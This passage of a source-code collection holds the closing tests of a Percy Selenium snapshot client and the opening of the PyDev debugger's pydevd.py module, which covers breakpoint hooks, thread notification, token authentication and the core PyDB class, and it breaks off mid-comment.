s1 = httpretty.latest_requests()[2].parsed_body
self.assertEqual(s1['name'], 'Snapshot 1')
self.assertEqual(s1['url'], 'http://localhost:8000/')
self.assertEqual(s1['dom_snapshot'], '<html><head></head><body>Snapshot Me</body></html>')
self.assertRegex(s1['client_info'], r'percy-selenium-python/\d+')
self.assertRegex(s1['environment_info'][0], r'selenium/\d+')
self.assertRegex(s1['environment_info'][1], r'python/\d+')
s2 = httpretty.latest_requests()[3].parsed_body
self.assertEqual(s2['name'], 'Snapshot 2')
self.assertEqual(s2['enable_javascript'], True)
def test_has_a_backwards_compatible_function(self):
mock_healthcheck()
mock_snapshot()
percySnapshot(browser=self.driver, name='Snapshot')
self.assertEqual(httpretty.last_request().path, '/percy/snapshot')
s1 = httpretty.latest_requests()[2].parsed_body
self.assertEqual(s1['name'], 'Snapshot')
self.assertEqual(s1['url'], 'http://localhost:8000/')
self.assertEqual(s1['dom_snapshot'], '<html><head></head><body>Snapshot Me</body></html>')
def test_handles_snapshot_errors(self):
mock_healthcheck()
mock_snapshot(fail=True)
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
mock_print.assert_any_call(f'{LABEL} Could not take DOM snapshot "Snapshot 1"')
if __name__ == '__main__':
unittest.main()
|
pydevd.py
|
'''
Entry point module (keep at root):
This module starts the debugger.
'''
import sys # @NoMove
if sys.version_info[:2] < (2, 6):
raise RuntimeError('The PyDev.Debugger requires Python 2.6 onwards to be run. If you need to use an older Python version, use an older version of the debugger.')
import atexit
from collections import defaultdict
from contextlib import contextmanager
from functools import partial
import itertools
import os
import traceback
import weakref
import getpass as getpass_mod
import functools
import pydevd_file_utils
from _pydev_bundle import pydev_imports, pydev_log
from _pydev_bundle._pydev_filesystem_encoding import getfilesystemencoding
from _pydev_bundle.pydev_is_thread_alive import is_thread_alive
from _pydev_bundle.pydev_override import overrides
from _pydev_imps._pydev_saved_modules import thread
from _pydev_imps._pydev_saved_modules import threading
from _pydev_imps._pydev_saved_modules import time
from _pydevd_bundle import pydevd_extension_utils, pydevd_frame_utils, pydevd_constants
from _pydevd_bundle.pydevd_filtering import FilesFiltering
from _pydevd_bundle import pydevd_io, pydevd_vm_type
from _pydevd_bundle import pydevd_utils
from _pydev_bundle.pydev_console_utils import DebugConsoleStdIn
from _pydevd_bundle.pydevd_additional_thread_info import set_additional_thread_info
from _pydevd_bundle.pydevd_breakpoints import ExceptionBreakpoint, get_exception_breakpoint
from _pydevd_bundle.pydevd_comm_constants import (CMD_THREAD_SUSPEND, CMD_STEP_INTO, CMD_SET_BREAK,
CMD_STEP_INTO_MY_CODE, CMD_STEP_OVER, CMD_SMART_STEP_INTO, CMD_RUN_TO_LINE,
CMD_SET_NEXT_STATEMENT, CMD_STEP_RETURN, CMD_ADD_EXCEPTION_BREAK, CMD_STEP_RETURN_MY_CODE,
CMD_STEP_OVER_MY_CODE, constant_to_str, CMD_STEP_INTO_COROUTINE)
from _pydevd_bundle.pydevd_constants import (IS_JYTH_LESS25, get_thread_id, get_current_thread_id,
dict_keys, dict_iter_items, DebugInfoHolder, PYTHON_SUSPEND, STATE_SUSPEND, STATE_RUN, get_frame,
clear_cached_thread_id, INTERACTIVE_MODE_AVAILABLE, SHOW_DEBUG_INFO_ENV, IS_PY34_OR_GREATER, IS_PY2, NULL,
NO_FTRACE, IS_IRONPYTHON, JSON_PROTOCOL, IS_CPYTHON, HTTP_JSON_PROTOCOL, USE_CUSTOM_SYS_CURRENT_FRAMES_MAP, call_only_once,
ForkSafeLock, IGNORE_BASENAMES_STARTING_WITH, EXCEPTION_TYPE_UNHANDLED)
from _pydevd_bundle.pydevd_defaults import PydevdCustomization # Note: import alias used on pydev_monkey.
from _pydevd_bundle.pydevd_custom_frames import CustomFramesContainer, custom_frames_container_init
from _pydevd_bundle.pydevd_dont_trace_files import DONT_TRACE, PYDEV_FILE, LIB_FILE, DONT_TRACE_DIRS
from _pydevd_bundle.pydevd_extension_api import DebuggerEventHandler
from _pydevd_bundle.pydevd_frame_utils import add_exception_to_frame, remove_exception_from_frame
from _pydevd_bundle.pydevd_net_command_factory_xml import NetCommandFactory
from _pydevd_bundle.pydevd_trace_dispatch import (
trace_dispatch as _trace_dispatch, global_cache_skips, global_cache_frame_skips, fix_top_level_trace_and_get_trace_func)
from _pydevd_bundle.pydevd_utils import save_main_module, is_current_thread_main_thread
from _pydevd_frame_eval.pydevd_frame_eval_main import (
frame_eval_func, dummy_trace_dispatch)
import pydev_ipython # @UnusedImport
from _pydevd_bundle.pydevd_source_mapping import SourceMapping
from pydevd_concurrency_analyser.pydevd_concurrency_logger import ThreadingLogger, AsyncioLogger, send_concurrency_message, cur_time
from pydevd_concurrency_analyser.pydevd_thread_wrappers import wrap_threads
from pydevd_file_utils import get_abs_path_real_path_and_base_from_frame, NORM_PATHS_AND_BASE_CONTAINER
from pydevd_file_utils import get_fullname, get_package_dir
from os.path import abspath as os_path_abspath
import pydevd_tracing
from _pydevd_bundle.pydevd_comm import (InternalThreadCommand, InternalThreadCommandForAnyThread,
create_server_socket)
from _pydevd_bundle.pydevd_comm import(InternalConsoleExec,
_queue, ReaderThread, GetGlobalDebugger, get_global_debugger,
set_global_debugger, WriterThread,
start_client, start_server, InternalGetBreakpointException, InternalSendCurrExceptionTrace,
InternalSendCurrExceptionTraceProceeded)
from _pydevd_bundle.pydevd_daemon_thread import PyDBDaemonThread, mark_as_pydevd_daemon_thread
from _pydevd_bundle.pydevd_process_net_command_json import PyDevJsonCommandProcessor
from _pydevd_bundle.pydevd_process_net_command import process_net_command
from _pydevd_bundle.pydevd_net_command import NetCommand
from _pydevd_bundle.pydevd_breakpoints import stop_on_unhandled_exception
from _pydevd_bundle.pydevd_collect_bytecode_info import collect_try_except_info, collect_return_info
from _pydevd_bundle.pydevd_suspended_frames import SuspendedFramesManager
from socket import SHUT_RDWR
from _pydevd_bundle.pydevd_api import PyDevdAPI
from _pydevd_bundle.pydevd_timeout import TimeoutTracker
from _pydevd_bundle.pydevd_thread_lifecycle import suspend_all_threads, mark_thread_suspended
if USE_CUSTOM_SYS_CURRENT_FRAMES_MAP:
from _pydevd_bundle.pydevd_constants import constructed_tid_to_last_frame
__version_info__ = (2, 1, 0)
__version_info_str__ = []
for v in __version_info__:
__version_info_str__.append(str(v))
__version__ = '.'.join(__version_info_str__)
# IMPORTANT: pydevd_constants must be the 1st thing defined because it'll keep a reference to the original sys._getframe
def install_breakpointhook(pydevd_breakpointhook=None):
if pydevd_breakpointhook is None:
def pydevd_breakpointhook(*args, **kwargs):
hookname = os.getenv('PYTHONBREAKPOINT')
if (
hookname is not None
and len(hookname) > 0
and hasattr(sys, '__breakpointhook__')
and sys.__breakpointhook__ != pydevd_breakpointhook
):
sys.__breakpointhook__(*args, **kwargs)
else:
settrace(*args, **kwargs)
if sys.version_info[0:2] >= (3, 7):
# There are some choices on how to provide the breakpoint hook. Namely, we can provide a
# PYTHONBREAKPOINT which provides the import path for a method to be executed or we
# can override sys.breakpointhook.
# pydevd overrides sys.breakpointhook instead of providing an environment variable because
# it's possible that the debugger starts the user program but is not available in the
# PYTHONPATH (and would thus fail to be imported if PYTHONBREAKPOINT was set to pydevd.settrace).
# Note that the implementation still takes PYTHONBREAKPOINT in account (so, if it was provided
# by someone else, it'd still work).
sys.breakpointhook = pydevd_breakpointhook
else:
if sys.version_info[0] >= 3:
import builtins as __builtin__ # Py3 noqa
else:
import __builtin__ # noqa
# In older versions, breakpoint() isn't really available, so, install the hook directly
# in the builtins.
__builtin__.breakpoint = pydevd_breakpointhook
sys.__breakpointhook__ = pydevd_breakpointhook
# Install the breakpoint hook at import time.
install_breakpointhook()
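# Illustrative note (not part of pydevd's logic, just a sketch of how the hook installed
# above behaves): on Python 3.7+ a plain `breakpoint()` call in user code ends up in
# pydevd_breakpointhook, which either defers to a user-provided PYTHONBREAKPOINT hook
# (through the original sys.__breakpointhook__) or falls back to settrace().
#
#     def user_code():            # hypothetical user function
#         x = compute()           # hypothetical call
#         breakpoint()            # suspends here through settrace() when PYTHONBREAKPOINT is unset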
SUPPORT_PLUGINS = not IS_JYTH_LESS25
PluginManager = None
if SUPPORT_PLUGINS:
from _pydevd_bundle.pydevd_plugin_utils import PluginManager
threadingEnumerate = threading.enumerate
threadingCurrentThread = threading.currentThread
try:
'dummy'.encode('utf-8') # Added because otherwise Jython 2.2.1 wasn't finding the encoding (if it wasn't loaded in the main thread).
except:
pass
_global_redirect_stdout_to_server = False
_global_redirect_stderr_to_server = False
file_system_encoding = getfilesystemencoding()
_CACHE_FILE_TYPE = {}
pydev_log.debug('Using GEVENT_SUPPORT: %s', pydevd_constants.SUPPORT_GEVENT)
pydev_log.debug('pydevd __file__: %s', os.path.abspath(__file__))
#=======================================================================================================================
# PyDBCommandThread
#=======================================================================================================================
class PyDBCommandThread(PyDBDaemonThread):
def __init__(self, py_db):
PyDBDaemonThread.__init__(self, py_db)
self._py_db_command_thread_event = py_db._py_db_command_thread_event
self.setName('pydevd.CommandThread')
@overrides(PyDBDaemonThread._on_run)
def _on_run(self):
# Delay a bit this initialization to wait for the main program to start.
self._py_db_command_thread_event.wait(0.3)
if self._kill_received:
return
try:
while not self._kill_received:
try:
self.py_db.process_internal_commands()
except:
pydev_log.info('Finishing debug communication...(2)')
self._py_db_command_thread_event.clear()
self._py_db_command_thread_event.wait(0.3)
except:
try:
pydev_log.debug(sys.exc_info()[0])
except:
# In interpreter shutdown many things can go wrong (any module variables may
# be None, streams can be closed, etc).
pass
# only got this error in interpreter shutdown
# pydev_log.info('Finishing debug communication...(3)')
@overrides(PyDBDaemonThread.do_kill_pydev_thread)
def do_kill_pydev_thread(self):
PyDBDaemonThread.do_kill_pydev_thread(self)
# Set flag so that it can exit before the usual timeout.
self._py_db_command_thread_event.set()
#=======================================================================================================================
# CheckAliveThread
# Non-daemon thread: guarantees that all data is written even if the program has finished
#=======================================================================================================================
class CheckAliveThread(PyDBDaemonThread):
def __init__(self, py_db):
PyDBDaemonThread.__init__(self, py_db)
self.setName('pydevd.CheckAliveThread')
self.daemon = False
self._wait_event = threading.Event()
@overrides(PyDBDaemonThread._on_run)
def _on_run(self):
py_db = self.py_db
def can_exit():
with py_db._main_lock:
# Note: it's important to get the lock besides checking that it's empty (this
# means that we're not in the middle of some command processing).
writer = py_db.writer
writer_empty = writer is not None and writer.empty()
return not py_db.has_user_threads_alive() and writer_empty
try:
while not self._kill_received:
self._wait_event.wait(0.3)
if can_exit():
break
py_db.check_output_redirect()
if can_exit():
pydev_log.debug("No threads alive, finishing debug session")
py_db.dispose_and_kill_all_pydevd_threads()
except:
pydev_log.exception()
def join(self, timeout=None):
# If someone tries to join this thread, mark it to be killed.
# This is the case for CherryPy when auto-reload is turned on.
self.do_kill_pydev_thread()
PyDBDaemonThread.join(self, timeout=timeout)
@overrides(PyDBDaemonThread.do_kill_pydev_thread)
def do_kill_pydev_thread(self):
PyDBDaemonThread.do_kill_pydev_thread(self)
# Set flag so that it can exit before the usual timeout.
self._wait_event.set()
class AbstractSingleNotificationBehavior(object):
'''
The basic usage should be:
# Increment the request time for the suspend.
single_notification_behavior.increment_suspend_time()
# Notify that this is a pause request (when a pause, not a breakpoint).
single_notification_behavior.on_pause()
# Mark threads to be suspended.
set_suspend(...)
# On do_wait_suspend, use notify_thread_suspended:
def do_wait_suspend(...):
with single_notification_behavior.notify_thread_suspended(thread_id):
...
'''
__slots__ = [
'_last_resume_notification_time',
'_last_suspend_notification_time',
'_lock',
'_next_request_time',
'_suspend_time_request',
'_suspended_thread_ids',
'_pause_requested',
'_py_db',
]
NOTIFY_OF_PAUSE_TIMEOUT = .5
def __init__(self, py_db):
self._py_db = weakref.ref(py_db)
self._next_request_time = partial(next, itertools.count())
self._last_suspend_notification_time = -1
self._last_resume_notification_time = -1
self._suspend_time_request = self._next_request_time()
self._lock = thread.allocate_lock()
self._suspended_thread_ids = set()
self._pause_requested = False
def send_suspend_notification(self, thread_id, stop_reason):
raise AssertionError('abstract: subclasses must override.')
def send_resume_notification(self, thread_id):
raise AssertionError('abstract: subclasses must override.')
def increment_suspend_time(self):
with self._lock:
self._suspend_time_request = self._next_request_time()
def on_pause(self):
# Upon a pause, we should force sending new suspend notifications
# if no notification is sent after some time and there's some thread already stopped.
with self._lock:
self._pause_requested = True
global_suspend_time = self._suspend_time_request
py_db = self._py_db()
if py_db is not None:
py_db.timeout_tracker.call_on_timeout(
self.NOTIFY_OF_PAUSE_TIMEOUT,
self._notify_after_timeout,
kwargs={'global_suspend_time': global_suspend_time}
)
def _notify_after_timeout(self, global_suspend_time):
with self._lock:
if self._suspended_thread_ids:
if global_suspend_time > self._last_suspend_notification_time:
self._last_suspend_notification_time = global_suspend_time
# Notify about any thread which is currently suspended.
pydev_log.info('Sending suspend notification after timeout.')
self.send_suspend_notification(next(iter(self._suspended_thread_ids)), CMD_THREAD_SUSPEND)
def on_thread_suspend(self, thread_id, stop_reason):
with self._lock:
pause_requested = self._pause_requested
if pause_requested:
# When a suspend notification is sent, reset the pause flag.
self._pause_requested = False
self._suspended_thread_ids.add(thread_id)
            # CMD_THREAD_SUSPEND should always be a side-effect of a break, so, only
            # issue a notification for a CMD_THREAD_SUSPEND if a pause is pending.
if stop_reason != CMD_THREAD_SUSPEND or pause_requested:
if self._suspend_time_request > self._last_suspend_notification_time:
pydev_log.info('Sending suspend notification.')
self._last_suspend_notification_time = self._suspend_time_request
self.send_suspend_notification(thread_id, stop_reason)
else:
pydev_log.info(
                        'Suspend not sent (it was already sent). Last suspend %s <= Last resume %s',
self._last_suspend_notification_time,
self._last_resume_notification_time,
)
else:
pydev_log.info(
'Suspend not sent because stop reason is thread suspend and pause was not requested.',
)
def on_thread_resume(self, thread_id):
# on resume (step, continue all):
with self._lock:
self._suspended_thread_ids.remove(thread_id)
if self._last_resume_notification_time < self._last_suspend_notification_time:
pydev_log.info('Sending resume notification.')
self._last_resume_notification_time = self._last_suspend_notification_time
self.send_resume_notification(thread_id)
else:
pydev_log.info(
'Resume not sent (it was already sent). Last resume %s >= Last suspend %s',
self._last_resume_notification_time,
self._last_suspend_notification_time,
)
@contextmanager
def notify_thread_suspended(self, thread_id, stop_reason):
self.on_thread_suspend(thread_id, stop_reason)
try:
yield # At this point the thread must be actually suspended.
finally:
self.on_thread_resume(thread_id)
class ThreadsSuspendedSingleNotification(AbstractSingleNotificationBehavior):
__slots__ = AbstractSingleNotificationBehavior.__slots__ + [
'multi_threads_single_notification', '_callbacks', '_callbacks_lock']
def __init__(self, py_db):
AbstractSingleNotificationBehavior.__init__(self, py_db)
# If True, pydevd will send a single notification when all threads are suspended/resumed.
self.multi_threads_single_notification = False
self._callbacks_lock = threading.Lock()
self._callbacks = []
def add_on_resumed_callback(self, callback):
with self._callbacks_lock:
self._callbacks.append(callback)
@overrides(AbstractSingleNotificationBehavior.send_resume_notification)
def send_resume_notification(self, thread_id):
py_db = self._py_db()
if py_db is not None:
py_db.writer.add_command(py_db.cmd_factory.make_thread_resume_single_notification(thread_id))
with self._callbacks_lock:
callbacks = self._callbacks
self._callbacks = []
for callback in callbacks:
callback()
@overrides(AbstractSingleNotificationBehavior.send_suspend_notification)
def send_suspend_notification(self, thread_id, stop_reason):
py_db = self._py_db()
if py_db is not None:
py_db.writer.add_command(py_db.cmd_factory.make_thread_suspend_single_notification(py_db, thread_id, stop_reason))
@overrides(AbstractSingleNotificationBehavior.notify_thread_suspended)
@contextmanager
def notify_thread_suspended(self, thread_id, stop_reason):
if self.multi_threads_single_notification:
with AbstractSingleNotificationBehavior.notify_thread_suspended(self, thread_id, stop_reason):
yield
else:
yield
class _Authentication(object):
__slots__ = ['access_token', 'client_access_token', '_authenticated', '_wrong_attempts']
def __init__(self):
        # A token to be sent in the command line or through the settrace api -- when such a token
# is given, the first message sent to the IDE must pass the same token to authenticate.
# Note that if a disconnect is sent, the same message must be resent to authenticate.
self.access_token = None
# This token is the one that the client requires to accept a connection from pydevd
# (it's stored here and just passed back when required, it's not used internally
# for anything else).
self.client_access_token = None
self._authenticated = None
self._wrong_attempts = 0
def is_authenticated(self):
if self._authenticated is None:
return self.access_token is None
return self._authenticated
def login(self, access_token):
if self._wrong_attempts >= 10: # A user can fail to authenticate at most 10 times.
return
self._authenticated = access_token == self.access_token
if not self._authenticated:
self._wrong_attempts += 1
else:
self._wrong_attempts = 0
def logout(self):
self._authenticated = None
self._wrong_attempts = 0
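# Illustrative sketch (not executed; it just shows the expected authentication handshake
# with the class above): when an access token is configured, the client must log in with
# the same token before being considered authenticated, and after 10 wrong attempts
# further logins are ignored.
#
#     auth = _Authentication()
#     auth.access_token = 'secret'
#     auth.is_authenticated()   # False: a token is required but no login happened yet
#     auth.login('wrong')
#     auth.is_authenticated()   # still False
#     auth.login('secret')
#     auth.is_authenticated()   # True
#     auth.logout()
#     auth.is_authenticated()   # False again until the next successful login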
class PyDB(object):
""" Main debugging class
Lots of stuff going on here:
PyDB starts two threads on startup that connect to remote debugger (RDB)
The threads continuously read & write commands to RDB.
PyDB communicates with these threads through command queues.
Every RDB command is processed by calling process_net_command.
Every PyDB net command is sent to the net by posting NetCommand to WriterThread queue
Some commands need to be executed on the right thread (suspend/resume & friends)
These are placed on the internal command queue.
"""
# Direct child pids which should not be terminated when terminating processes.
    # Note: stored at the class level because it should outlive PyDB instances.
dont_terminate_child_pids = set()
def __init__(self, set_as_global=True):
if set_as_global:
pydevd_tracing.replace_sys_set_trace_func()
self.authentication = _Authentication()
self.reader = None
self.writer = None
self.created_pydb_daemon_threads = {}
self._waiting_for_connection_thread = None
self._on_configuration_done_event = threading.Event()
self.check_alive_thread = None
self.py_db_command_thread = None
self.quitting = None
self.cmd_factory = NetCommandFactory()
self._cmd_queue = defaultdict(_queue.Queue) # Key is thread id or '*', value is Queue
self.suspended_frames_manager = SuspendedFramesManager()
self._files_filtering = FilesFiltering()
self.timeout_tracker = TimeoutTracker(self)
# Note: when the source mapping is changed we also have to clear the file types cache
# (because if a given file is a part of the project or not may depend on it being
# defined in the source mapping).
self.source_mapping = SourceMapping(on_source_mapping_changed=self._clear_filters_caches)
# Determines whether we should terminate child processes when asked to terminate.
self.terminate_child_processes = True
# These are the breakpoints received by the PyDevdAPI. They are meant to store
# the breakpoints in the api -- its actual contents are managed by the api.
self.api_received_breakpoints = {}
# These are the breakpoints meant to be consumed during runtime.
self.breakpoints = {}
# Set communication protocol
PyDevdAPI().set_protocol(self, 0, PydevdCustomization.DEFAULT_PROTOCOL)
self.variable_presentation = PyDevdAPI.VariablePresentation()
# mtime to be raised when breakpoints change
self.mtime = 0
self.file_to_id_to_line_breakpoint = {}
self.file_to_id_to_plugin_breakpoint = {}
# Note: breakpoints dict should not be mutated: a copy should be created
# and later it should be assigned back (to prevent concurrency issues).
self.break_on_uncaught_exceptions = {}
self.break_on_caught_exceptions = {}
self.break_on_user_uncaught_exceptions = {}
self.ready_to_run = False
self._main_lock = thread.allocate_lock()
self._lock_running_thread_ids = thread.allocate_lock()
self._py_db_command_thread_event = threading.Event()
if set_as_global:
CustomFramesContainer._py_db_command_thread_event = self._py_db_command_thread_event
self.pydb_disposed = False
self._wait_for_threads_to_finish_called = False
self._wait_for_threads_to_finish_called_lock = thread.allocate_lock()
self._wait_for_threads_to_finish_called_event = threading.Event()
self.terminate_requested = False
self._disposed_lock = thread.allocate_lock()
self.signature_factory = None
self.SetTrace = pydevd_tracing.SetTrace
self.skip_on_exceptions_thrown_in_same_context = False
self.ignore_exceptions_thrown_in_lines_with_ignore_exception = True
# Suspend debugger even if breakpoint condition raises an exception.
# May be changed with CMD_PYDEVD_JSON_CONFIG.
self.skip_suspend_on_breakpoint_exception = () # By default suspend on any Exception.
self.skip_print_breakpoint_exception = () # By default print on any Exception.
# By default user can step into properties getter/setter/deleter methods
self.disable_property_trace = False
self.disable_property_getter_trace = False
self.disable_property_setter_trace = False
self.disable_property_deleter_trace = False
        # This is a dict of thread ids pointing to threads. Whenever a command is passed to the java end that
        # acknowledges that a thread was created, the thread id should be passed here -- and if at some point we do
        # not find that thread alive anymore, we must remove it from this list and make the java side know that the
        # thread was killed.
self._running_thread_ids = {}
# Note: also access '_enable_thread_notifications' with '_lock_running_thread_ids'
self._enable_thread_notifications = False
self._set_breakpoints_with_id = False
# This attribute holds the file-> lines which have an @IgnoreException.
self.filename_to_lines_where_exceptions_are_ignored = {}
# working with plugins (lazily initialized)
self.plugin = None
self.has_plugin_line_breaks = False
self.has_plugin_exception_breaks = False
self.thread_analyser = None
self.asyncio_analyser = None
# matplotlib support in debugger and debug console
self.mpl_in_use = False
self.mpl_hooks_in_debug_console = False
self.mpl_modules_for_patching = {}
self._filename_to_not_in_scope = {}
self.first_breakpoint_reached = False
self._exclude_filters_enabled = self._files_filtering.use_exclude_filters()
self._is_libraries_filter_enabled = self._files_filtering.use_libraries_filter()
self.is_files_filter_enabled = self._exclude_filters_enabled or self._is_libraries_filter_enabled
self.show_return_values = False
self.remove_return_values_flag = False
self.redirect_output = False
# this flag disables frame evaluation even if it's available
self.use_frame_eval = True
# If True, pydevd will send a single notification when all threads are suspended/resumed.
self._threads_suspended_single_notification = ThreadsSuspendedSingleNotification(self)
# If True a step command will do a step in one thread and will also resume all other threads.
self.stepping_resumes_all_threads = False
self._local_thread_trace_func = threading.local()
self._server_socket_ready_event = threading.Event()
self._server_socket_name = None
# Bind many locals to the debugger because upon teardown those names may become None
# in the namespace (and thus can't be relied upon unless the reference was previously
# saved).
if IS_IRONPYTHON:
# A partial() cannot be used in IronPython for sys.settrace.
def new_trace_dispatch(frame, event, arg):
return _trace_dispatch(self, frame, event, arg)
self.trace_dispatch = new_trace_dispatch
else:
self.trace_dispatch = partial(_trace_dispatch, self)
self.fix_top_level_trace_and_get_trace_func = fix_top_level_trace_and_get_trace_func
self.frame_eval_func = frame_eval_func
self.dummy_trace_dispatch = dummy_trace_dispatch
        # Note: this is different from pydevd_constants.thread_get_ident because on Jython we want
        # this to be None (Jython also doesn't have threading._active).
try:
self.threading_get_ident = threading.get_ident # Python 3
self.threading_active = threading._active
except:
try:
self.threading_get_ident = threading._get_ident # Python 2 noqa
self.threading_active = threading._active
except:
self.threading_get_ident = None # Jython
self.threading_active = None
self.threading_current_thread = threading.currentThread
self.set_additional_thread_info = set_additional_thread_info
self.stop_on_unhandled_exception = stop_on_unhandled_exception
self.collect_try_except_info = collect_try_except_info
self.collect_return_info = collect_return_info
self.get_exception_breakpoint = get_exception_breakpoint
self._dont_trace_get_file_type = DONT_TRACE.get
self._dont_trace_dirs_get_file_type = DONT_TRACE_DIRS.get
self.PYDEV_FILE = PYDEV_FILE
self.LIB_FILE = LIB_FILE
self._in_project_scope_cache = {}
self._exclude_by_filter_cache = {}
self._apply_filter_cache = {}
self._ignore_system_exit_codes = set()
# DAP related
self._dap_messages_listeners = []
if set_as_global:
# Set as the global instance only after it's initialized.
set_global_debugger(self)
# Stop the tracing as the last thing before the actual shutdown for a clean exit.
atexit.register(stoptrace)
def get_arg_ppid(self):
try:
setup = SetupHolder.setup
if setup:
return int(setup.get('ppid', 0))
except:
pydev_log.exception('Error getting ppid.')
return 0
def wait_for_ready_to_run(self):
while not self.ready_to_run:
# busy wait until we receive run command
self.process_internal_commands()
self._py_db_command_thread_event.clear()
self._py_db_command_thread_event.wait(0.1)
def on_initialize(self):
'''
Note: only called when using the DAP (Debug Adapter Protocol).
'''
self._on_configuration_done_event.clear()
def on_configuration_done(self):
'''
Note: only called when using the DAP (Debug Adapter Protocol).
'''
self._on_configuration_done_event.set()
self._py_db_command_thread_event.set()
def is_attached(self):
return self._on_configuration_done_event.is_set()
def on_disconnect(self):
'''
Note: only called when using the DAP (Debug Adapter Protocol).
'''
self.authentication.logout()
self._on_configuration_done_event.clear()
def set_ignore_system_exit_codes(self, ignore_system_exit_codes):
assert isinstance(ignore_system_exit_codes, (list, tuple, set))
self._ignore_system_exit_codes = set(ignore_system_exit_codes)
def ignore_system_exit_code(self, system_exit_exc):
if hasattr(system_exit_exc, 'code'):
return system_exit_exc.code in self._ignore_system_exit_codes
else:
return system_exit_exc in self._ignore_system_exit_codes
def block_until_configuration_done(self, cancel=None):
if cancel is None:
cancel = NULL
while not cancel.is_set():
if self._on_configuration_done_event.is_set():
cancel.set() # Set cancel to prevent reuse
return
self.process_internal_commands()
self._py_db_command_thread_event.clear()
self._py_db_command_thread_event.wait(1 / 15.)
def add_fake_frame(self, thread_id, frame_id, frame):
self.suspended_frames_manager.add_fake_frame(thread_id, frame_id, frame)
def handle_breakpoint_condition(self, info, pybreakpoint, new_frame):
condition = pybreakpoint.condition
try:
if pybreakpoint.handle_hit_condition(new_frame):
return True
if not condition:
return False
return eval(condition, new_frame.f_globals, new_frame.f_locals)
except Exception as e:
if IS_PY2:
# Must be bytes on py2.
if isinstance(condition, unicode): # noqa
condition = condition.encode('utf-8')
if not isinstance(e, self.skip_print_breakpoint_exception):
sys.stderr.write('Error while evaluating expression: %s\n' % (condition,))
etype, value, tb = sys.exc_info()
traceback.print_exception(etype, value, tb.tb_next)
if not isinstance(e, self.skip_suspend_on_breakpoint_exception):
try:
# add exception_type and stacktrace into thread additional info
etype, value, tb = sys.exc_info()
error = ''.join(traceback.format_exception_only(etype, value))
stack = traceback.extract_stack(f=tb.tb_frame.f_back)
# On self.set_suspend(thread, CMD_SET_BREAK) this info will be
# sent to the client.
info.conditional_breakpoint_exception = \
('Condition:\n' + condition + '\n\nError:\n' + error, stack)
except:
pydev_log.exception()
return True
return False
finally:
etype, value, tb = None, None, None
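    # Illustrative sketch (comments only; `bp` and `items` are hypothetical) of how a
    # conditional breakpoint behaves when hit:
    #
    #     bp.condition = 'len(items) > 10'
    #     # evaluated roughly as: eval('len(items) > 10', new_frame.f_globals, new_frame.f_locals)
    #     # True   -> suspend the thread at the breakpoint
    #     # False  -> keep running
    #     # raises -> report the error and, unless the exception type is listed in
    #     #           skip_suspend_on_breakpoint_exception, suspend anyway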
def handle_breakpoint_expression(self, pybreakpoint, info, new_frame):
try:
try:
val = eval(pybreakpoint.expression, new_frame.f_globals, new_frame.f_locals)
except:
val = sys.exc_info()[1]
finally:
if val is not None:
info.pydev_message = str(val)
def _internal_get_file_type(self, abs_real_path_and_basename):
basename = abs_real_path_and_basename[-1]
if (
basename.startswith(IGNORE_BASENAMES_STARTING_WITH) or
abs_real_path_and_basename[0].startswith(IGNORE_BASENAMES_STARTING_WITH)
):
# Note: these are the files that are completely ignored (they aren't shown to the user
# as user nor library code as it's usually just noise in the frame stack).
return self.PYDEV_FILE
file_type = self._dont_trace_get_file_type(basename)
if file_type is not None:
return file_type
if basename.startswith('__init__.py'):
# i.e.: ignore the __init__ files inside pydevd (the other
# files are ignored just by their name).
abs_path = abs_real_path_and_basename[0]
i = max(abs_path.rfind('/'), abs_path.rfind('\\'))
if i:
abs_path = abs_path[0:i]
i = max(abs_path.rfind('/'), abs_path.rfind('\\'))
if i:
dirname = abs_path[i + 1:]
# At this point, something as:
# "my_path\_pydev_runfiles\__init__.py"
# is now "_pydev_runfiles".
return self._dont_trace_dirs_get_file_type(dirname)
return None
def dont_trace_external_files(self, abs_path):
'''
:param abs_path:
The result from get_abs_path_real_path_and_base_from_file or
get_abs_path_real_path_and_base_from_frame.
:return
True :
If files should NOT be traced.
False:
If files should be traced.
'''
# By default all external files are traced. Note: this function is expected to
# be changed for another function in PyDevdAPI.set_dont_trace_start_end_patterns.
return False
def get_file_type(self, frame, abs_real_path_and_basename=None, _cache_file_type=_CACHE_FILE_TYPE):
'''
:param abs_real_path_and_basename:
The result from get_abs_path_real_path_and_base_from_file or
get_abs_path_real_path_and_base_from_frame.
:return
_pydevd_bundle.pydevd_dont_trace_files.PYDEV_FILE:
If it's a file internal to the debugger which shouldn't be
traced nor shown to the user.
_pydevd_bundle.pydevd_dont_trace_files.LIB_FILE:
If it's a file in a library which shouldn't be traced.
None:
If it's a regular user file which should be traced.
'''
if abs_real_path_and_basename is None:
try:
# Make fast path faster!
abs_real_path_and_basename = NORM_PATHS_AND_BASE_CONTAINER[frame.f_code.co_filename]
except:
abs_real_path_and_basename = get_abs_path_real_path_and_base_from_frame(frame)
# Note 1: we have to take into account that we may have files as '<string>', and that in
# this case the cache key can't rely only on the filename. With the current cache, there's
# still a potential miss if 2 functions which have exactly the same content are compiled
        # with '<string>', but as we only separate the one from python -c from the rest, this
        # shouldn't be a problem in practice.
# Note 2: firstlineno added to make misses faster in the first comparison.
# Note 3: this cache key is repeated in pydevd_frame_evaluator.pyx:get_func_code_info (for
# speedups).
cache_key = (frame.f_code.co_firstlineno, abs_real_path_and_basename[0], frame.f_code)
try:
return _cache_file_type[cache_key]
except:
if abs_real_path_and_basename[0] == '<string>':
# Consider it an untraceable file unless there's no back frame (ignoring
# internal files and runpy.py).
f = frame.f_back
while f is not None:
if (self.get_file_type(f) != self.PYDEV_FILE and
pydevd_file_utils.basename(f.f_code.co_filename) not in ('runpy.py', '<string>')):
# We found some back frame that's not internal, which means we must consider
# this a library file.
# This is done because we only want to trace files as <string> if they don't
# have any back frame (which is the case for python -c ...), for all other
# cases we don't want to trace them because we can't show the source to the
# user (at least for now...).
# Note that we return as a LIB_FILE and not PYDEV_FILE because we still want
# to show it in the stack.
_cache_file_type[cache_key] = LIB_FILE
return LIB_FILE
f = f.f_back
else:
# This is a top-level file (used in python -c), so, trace it as usual... we
# still won't be able to show the sources, but some tests require this to work.
_cache_file_type[cache_key] = None
return None
file_type = self._internal_get_file_type(abs_real_path_and_basename)
if file_type is None:
if self.dont_trace_external_files(abs_real_path_and_basename[0]):
file_type = PYDEV_FILE
_cache_file_type[cache_key] = file_type
return file_type
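    # Illustrative summary (comments only) of the classifications returned by get_file_type():
    #
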